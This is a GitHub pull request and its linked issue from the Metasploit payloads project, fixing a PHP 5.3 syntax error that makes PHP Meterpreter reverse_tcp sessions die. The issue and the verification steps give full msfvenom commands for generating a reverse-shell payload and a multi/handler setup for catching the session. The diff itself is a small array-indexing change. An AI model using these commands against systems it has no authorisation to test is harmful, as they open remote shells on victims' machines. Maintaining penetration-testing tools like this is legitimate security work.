### PR TITLE
Fix #95, unexpected syntax error '[' in PHP 5.3.6-13 that's causing Meterpreter to die

### LINKED ISSUE #95: PHP Meterpreter session dies as soon as it's connected
## Problem

php/meterpreter/reverse_tcp session dies as soon as it is connected, like the following screenshot:

screen shot 2016-04-06 at 11 11 07 am

## framework.log

LogLevel is at 3, but framework.log has nothing much to show:

```
[04/06/2016 11:10:06] [w(0)] core: Session 3 has died
[04/06/2016 11:10:35] [d(0)] core: Session 3 did not respond to validation request Rex::TimeoutError: Operation timed out
```

## Setup

The victim machine:

* Ubuntu 11.10
* PHP 5.3.6-13

Here's how I generated the payload and executed it:

1. ```./msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw -o /tmp/test.php```
2. scp test.php to the Ubuntu box
3. ```php test.php``` (executed as root when I tested it)

### PR DESCRIPTION
**Pull request by wchen-r7**
This fixes a syntax error that seems to be specific to older versions of PHP, such as 5.3.6-13 (the one I tested). The error causes Meterpreter to die as soon as a session is opened.

Fix #95

## Verification

- [ ] Install PHP 5.3.6-13 or older
- [ ] Do: ```./msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw -o /tmp/test.php```
- [ ] Start msfconsole
- [ ] Do: ```use exploit/multi/handler```
- [ ] Do: ```set payload php/meterpreter/reverse_tcp```
- [ ] Do: ```set lhost [IP]```
- [ ] Do: ```run```
- [ ] On the box with PHP 5.3.6-13, chmod +x and run test.php: ```php test.php```
- [ ] msfconsole should get a session.  And it should not die.

### CODE REVIEW

**Comment by OJ** [comment]
Wow! So earlier versions can't index rvalues?

Epic.

**Comment by OJ** [comment]
Jenkins add to whitelist

**Comment by timwr** [comment]
Silly php.
http://stackoverflow.com/questions/1664362/access-an-array-returned-by-a-function
The fix looks good

File: php/meterpreter/meterpreter.php [hunk 1]
```diff
@@ -1263,7 +1263,8 @@ function remove_reader($resource) {
             }
             $xor = strrev(substr($header, 0, 4));
             $request = substr($header, 4);
-            $len = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)))['len'];
+            $len_array = unpack("Nlen", xor_bytes($xor, substr($request, 0, 4)));
+            $len = $len_array['len']
```
Comment (egypt) [inline php/meterpreter/meterpreter.php]: Missing a `;`, so still a syntax error for me. I'll fix on landing

Comment (wchen-r7) [inline php/meterpreter/meterpreter.php]: oh man, I had one job to do -_-

**Comment by OJ** [comment]
Thanks @egypt, getting PHP 5.3 installed was proving to be a PITA.
